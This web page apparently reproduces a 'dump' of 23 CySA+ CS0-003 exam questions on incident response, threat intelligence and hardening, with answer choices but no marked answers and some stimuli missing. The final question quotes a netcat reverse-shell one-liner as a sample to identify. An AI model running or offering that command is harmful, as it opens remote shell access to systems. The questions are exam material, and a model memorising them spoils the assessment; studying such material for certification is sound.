ERASED TEST, YOU MAY BE INTERESTED ON
CySA+ CS0-003 Jan24
COMMENTS |
STATISTICS |
RECORDS
|
|---|
TAKE THE TEST
|
Title of test:
CySA+ CS0-003 Jan24 Description: CySa+ Dump Jan24 Author:
Creation Date: 08/02/2024 Category: Computers Number of questions: 23 |
Share the Test:
Last comments
No comments about this test.
Content:
|
Which of the following best describes the key elements of a successful information security program? Business impact analysis, asset and change management, and security communication plan Security policy implementation, assignment of roles and responsibilities, and information asset classification Disaster recovery and business continuity planning, and the definition of access control requirements and human resource policies Senior management organizational structure, message distribution standards, and procedures for the operation of security management systems. Which of the following security operations tasks are ideal for automation? Suspicious file analysis: Look for suspicious-looking graphics in a folder. Create subfolders in the original folder based on category of graphics found. Move the suspicious graphics to the appropriate subfolder Firewall IoC block actions: Examine the firewall logs for IoCs from the most recently published zero-day exploit Take mitigating actions in the firewall to block the behavior found in the logs Follow up on any false positives that were caused by the block rules Security application user errors: Search the error logs for signs of users having trouble with the security application Look up the user's phone number Call the user to help with any questions about using the application Email header analysis: Check the email header for a phishing confidence metric greater than or equal to five Add the domain of sender to the block list Move the email to quarantine. A cybersecurity team has witnessed numerous vulnerability events recently that have affected operating systems. The team decides to implement host-based IPS, firewalls, and two-factor authentication. Which of the following does this most likely describe? System hardening Hybrid network architecture Continuous authorization Secure access service edge. A company brings in a consultant to make improvements to its website. After the consultant leaves a web developer notices unusual activity on the website and submits a suspicious file containing the following code to the security team: Implanted a backdoor Implemented privilege escalation Implemented clickjacking Patched the web server. Which of the following makes STIX and OpenloC information readable by both humans and machines? XML URL OVAL TAXII. An incident response analyst is investigating the root cause of a recent malware outbreak. Initial binary analysis indicates that this malware disables host security services and performs cleanup routines on it infected hosts, including deletion of initial dropper and removal of event log entries and prefetch files from the host. Which of the following data sources would most likely reveal evidence of the root cause? (Select two) Creation time of dropper Registry artifacts EDR data Prefetch files File system metadata Sysmon event log. During an incident, some loCs of possible ransomware contamination were found in a group of servers in a segment of the network. Which of the following steps should be taken next? Isolation Remediation Reimaging Preservation. When investigating a potentially compromised host, an analyst observes that the process BGInfo.exe (PID 1024), a Sysinternals tool used to create desktop backgrounds containing host details, has bee running for over two days. Which of the following activities will provide the best insight into this potentially malicious process, based on the anomalous behavior? Changes to system environment variables SMB network traffic related to the system process Recent browser history of the primary user Activities taken by PID 1024. A Chief Information Security Officer (CISO) wants to disable a functionality on a business-critical web application that is vulnerable to RCE in order to maintain the minimum risk level with minimal increased cost. Which of the following risk treatments best describes what the CISO is looking for? Transfer Mitigate Accept Avoid. An organization would like to ensure its cloud infrastructure has a hardened configuration. A requirement is to create a server image that can be deployed with a secure template. Which of the following is the best resource to ensure secure configuration? CIS Benchmarks PCI DSS OWASP Top Ten ISO 27001. Which of the following is a reason why proper handling and reporting of existing evidence are important for the investigation and reporting phases of an incident response? TO ensure the report is legally acceptable in case it needs to be presented in court To present a lessons-learned analysis for the incident response team To ensure the evidence can be used in a postmortem analysis To prevent the possible loss of a data source for further root cause analysis. While performing a dynamic analysis of a malicious file, a security analyst notices the memory address changes every time the process runs. Which of the following controls is most likely preventing the analyst from finding the proper memory address of the piece of malicious code? Address space layout randomization Data execution prevention Stack canary Code obfuscation. An analyst wants to ensure that users only leverage web-based software that has been pre-approved by the organization. Which of the following should be deployed? Blocklisting Allowlisting Graylisting Webhooks. A security analyst is reviewing the findings of the latest vulnerability report for a company's web application. The web application accepts files for a Bash script to be processed if the files match a given hash. The analyst is able to submit files to the system due to a hash collision. Which of the following should the analyst suggest to mitigate the vulnerability with the fewest changes to the current script and infrastructure? Deploy a WAF to the front of the application. Replace the current MD5 with SHA-256 Deploy an antivirus application on the hosting system. Replace the MD5 with digital signatures. A Chief Information Security Officer wants to map all the attack vectors that the company faces each day. Which of the following recommendations should the company align their security controls around? OSSTMM Diamond Model Of Intrusion Analysis OWASP MITRE ATT&CK. Which of the following best describes the importance of implementing TAXII as part of a threat intelligence program? It provides a structured way to gain information about insider threats. It proactively facilitates real-time information sharing between the public and private sectors. It exchanges messages in the most cost-effective way and requires little maintenance once implemented. It is a semi-automated solution to gather threat intellbgence about competitors in the same sector. attacks. Which of the following combinations of configuration changes should the organization make to remediate this issue? (Select two). Configure the server to prefer TLS 1.3. Remove cipher suites that use CBC. Configure the server to prefer ephemeral modes for key exchange. Require client browsers to present a user certificate for mutual authentication. Configure the server to require HSTS. Remove cipher suites that use GCM. Which of the following best describes the threat concept in which an organization works to ensure that all network users only open attachments from known sources? Hacktivist threat Advanced persistent threat Unintentional insider threat Nation-state threat. A company has the following security requirements: . No public IPs * All data secured at rest . No insecure ports/protocols After a cloud scan is completed, a security analyst receives reports that several misconfigurations are putting the company at risk. Given the following cloud scanner output: Which of the following should the analyst recommend be updated first to meet the security requirements and reduce risks? VM_PRD_DB VM_DEV_DB VM_DEV_Web02 VM_PRD_Web01. Which of the following should be updated after a lessons-learned review? Disaster recovery plan Business continuity plan Tabletop exercise Incident response plan. A disgruntled open-source developer has decided to sabotage a code repository with a logic bomb that will act as a wiper. Which of the following parts of the Cyber Kill Chain does this act exhibit? Reconnaissance Weaponization Exploitation Installation. Following an incident, a security analyst needs to create a script for downloading the configuration of all assets from the cloud tenancy. Which of the following authentication methods should the analyst use? MFA User and password PAM Key pair. A security analyst detected the following suspicious activity: rm -f /tmp/f; mknod /tmp/f p; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 1234 > tmp/f Which of the following most likely describes the activity? Network pivoting Host scanning Privilege escalation Reverse shell. |